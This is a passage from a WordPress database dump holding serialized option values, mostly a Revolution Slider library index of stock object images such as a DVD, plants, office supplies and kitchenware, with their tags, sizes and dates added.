block_exchange_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25539,'widget_td_block_instagram_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25544,'revslider-templates-check','1694678538','yes'),(25548,'revslider-library-check','1694678539','yes'),(25549,'rs-library','a:3:{s:4:\"hash\";s:32:\"0fbedf953c0042911e0f27a364cf4227\";s:7:\"objects\";a:179:{i:0;a:12:{s:2:\"id\";s:3:\"198\";s:6:\"handle\";s:16:\"object_dvd_1.png\";s:4:\"name\";s:3:\"DVD\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-10-17 12:43:17\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:1;a:12:{s:2:\"id\";s:3:\"188\";s:6:\"handle\";s:18:\"object_plant_1.png\";s:4:\"name\";s:7:\"Plant 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:2;a:12:{s:2:\"id\";s:3:\"187\";s:6:\"handle\";s:16:\"object_pen_1.png\";s:4:\"name\";s:5:\"Pen 1\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:3;a:12:{s:2:\"id\";s:3:\"172\";s:6:\"handle\";s:16:\"object_egg_1.png\";s:4:\"name\";s:3:\"Egg\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:4;a:12:{s:2:\"id\";s:3:\"171\";s:6:\"handle\";s:19:\"object_guitar_1.png\";s:4:\"name\";s:6:\"Guitar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:5;a:12:{s:2:\"id\";s:3:\"170\";s:6:\"handle\";s:21:\"object_envelope_1.png\";s:4:\"name\";s:15:\"Closed Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:6;a:12:{s:2:\"id\";s:3:\"169\";s:6:\"handle\";s:19:\"object_postit_2.png\";s:4:\"name\";s:18:\"Postit Label White\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:7;a:12:{s:2:\"id\";s:3:\"168\";s:6:\"handle\";s:21:\"object_envelope_2.png\";s:4:\"name\";s:13:\"Open Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:8;a:12:{s:2:\"id\";s:3:\"167\";s:6:\"handle\";s:17:\"object_eggs_1.png\";s:4:\"name\";s:10:\"Egg Carton\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:9;a:12:{s:2:\"id\";s:3:\"166\";s:6:\"handle\";s:25:\"object_bottleopener_1.png\";s:4:\"name\";s:13:\"Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:10;a:12:{s:2:\"id\";s:3:\"165\";s:6:\"handle\";s:23:\"object_blueprints_1.png\";s:4:\"name\";s:10:\"Blueprints\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:11;a:12:{s:2:\"id\";s:3:\"164\";s:6:\"handle\";s:22:\"object_holepunch_1.png\";s:4:\"name\";s:10:\"Hole punch\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:12;a:12:{s:2:\"id\";s:3:\"163\";s:6:\"handle\";s:20:\"object_speaker_1.png\";s:4:\"name\";s:13:\"Black Speaker\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:13;a:12:{s:2:\"id\";s:3:\"162\";s:6:\"handle\";s:19:\"object_eraser_1.png\";s:4:\"name\";s:6:\"Eraser\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"500\";s:6:\"height\";s:3:\"500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:14;a:12:{s:2:\"id\";s:3:\"161\";s:6:\"handle\";s:23:\"object_vinylcover_1.png\";s:4:\"name\";s:11:\"Vinyl Cover\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:15;a:12:{s:2:\"id\";s:3:\"160\";s:6:\"handle\";s:20:\"object_booklet_1.png\";s:4:\"name\";s:9:\"Booklet 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:16;a:12:{s:2:\"id\";s:3:\"159\";s:6:\"handle\";s:22:\"object_earphones_2.png\";s:4:\"name\";s:11:\"Earphones 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:17;a:12:{s:2:\"id\";s:3:\"158\";s:6:\"handle\";s:18:\"object_vinyl_1.png\";s:4:\"name\";s:5:\"Vinyl\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:18;a:12:{s:2:\"id\";s:3:\"157\";s:6:\"handle\";s:19:\"object_postit_1.png\";s:4:\"name\";s:17:\"Postit Label Pink\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:19;a:12:{s:2:\"id\";s:3:\"156\";s:6:\"handle\";s:23:\"object_mechpencil_1.png\";s:4:\"name\";s:17:\"Mechanical Pencil\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:20;a:12:{s:2:\"id\";s:3:\"155\";s:6:\"handle\";s:22:\"object_turntable_1.png\";s:4:\"name\";s:9:\"Turntable\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:21;a:12:{s:2:\"id\";s:3:\"154\";s:6:\"handle\";s:19:\"object_folder_2.png\";s:4:\"name\";s:19:\"Closed Folder Black\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:22;a:12:{s:2:\"id\";s:3:\"153\";s:6:\"handle\";s:19:\"object_postit_4.png\";s:4:\"name\";s:18:\"Postit Label Green\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:23;a:12:{s:2:\"id\";s:3:\"152\";s:6:\"handle\";s:19:\"object_folder_1.png\";s:4:\"name\";s:12:\"Blank Folder\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:24;a:12:{s:2:\"id\";s:3:\"151\";s:6:\"handle\";s:19:\"object_pencup_1.png\";s:4:\"name\";s:7:\"Pen Cup\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:25;a:12:{s:2:\"id\";s:3:\"150\";s:6:\"handle\";s:23:\"object_winebottle_1.png\";s:4:\"name\";s:15:\"Red Wine Bottle\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:26;a:12:{s:2:\"id\";s:3:\"149\";s:6:\"handle\";s:23:\"object_headphones_1.png\";s:4:\"name\";s:10:\"Headphones\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:27;a:12:{s:2:\"id\";s:3:\"148\";s:6:\"handle\";s:22:\"object_earphones_1.png\";s:4:\"name\";s:9:\"Earphones\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:28;a:12:{s:2:\"id\";s:3:\"147\";s:6:\"handle\";s:19:\"object_postit_3.png\";s:4:\"name\";s:19:\"Postit Label Yellow\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:29;a:12:{s:2:\"id\";s:3:\"146\";s:6:\"handle\";s:22:\"object_corkscrew_1.png\";s:4:\"name\";s:23:\"Corkscrew Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1300\";s:6:\"height\";s:4:\"1300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:30;a:12:{s:2:\"id\";s:3:\"145\";s:6:\"handle\";s:19:\"object_muffin_1.png\";s:4:\"name\";s:16:\"Chocolate Muffin\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:31;a:12:{s:2:\"id\";s:3:\"144\";s:6:\"handle\";s:18:\"object_chair_2.png\";s:4:\"name\";s:12:\"Yellow Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:32;a:12:{s:2:\"id\";s:3:\"143\";s:6:\"handle\";s:18:\"object_knife_2.png\";s:4:\"name\";s:7:\"Knife 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:33;a:12:{s:2:\"id\";s:3:\"142\";s:6:\"handle\";s:26:\"object_choppingboard_2.png\";s:4:\"name\";s:16:\"Chopping Board 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:34;a:12:{s:2:\"id\";s:3:\"141\";s:6:\"handle\";s:26:\"object_choppingboard_3.png\";s:4:\"name\";s:16:\"Chopping Board 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:35;a:12:{s:2:\"id\";s:3:\"140\";s:6:\"handle\";s:19:\"object_coffee_2.png\";s:4:\"name\";s:12:\"Coffee Cup 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:4:\"1200\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:36;a:12:{s:2:\"id\";s:3:\"139\";s:6:\"handle\";s:18:\"object_bread_1.png\";s:4:\"name\";s:15:\"Croissant Bread\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:37;a:12:{s:2:\"id\";s:3:\"138\";s:6:\"handle\";s:18:\"object_spoon_2.png\";s:4:\"name\";s:12:\"Wodden Spoon\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:38;a:12:{s:2:\"id\";s:3:\"137\";s:6:\"handle\";s:26:\"object_choppingboard_1.png\";s:4:\"name\";s:16:\"Chopping Board 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:39;a:12:{s:2:\"id\";s:3:\"136\";s:6:\"handle\";s:16:\"object_cup_2.png\";s:4:\"name\";s:11:\"Empty Cup 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:40;a:12:{s:2:\"id\";s:3:\"135\";s:6:\"handle\";s:18:\"object_knife_1.png\";s:4:\"name\";s:5:\"Knife\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:41;a:12:{s:2:\"id\";s:3:\"134\";s:6:\"handle\";s:18:\"object_spoon_1.png\";s:4:\"name\";s:5:\"Spoon\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:42;a:12:{s:2:\"id\";s:3:\"133\";s:6:\"handle\";s:16:\"object_cup_1.png\";s:4:\"name\";s:9:\"Empty Cup\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:43;a:12:{s:2:\"id\";s:3:\"132\";s:6:\"handle\";s:18:\"object_chair_3.png\";s:4:\"name\";s:11:\"White Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:44;a:12:{s:2:\"id\";s:3:\"131\";s:6:\"handle\";s:19:\"object_coffee_1.png\";s:4:\"name\";s:10:\"Coffee 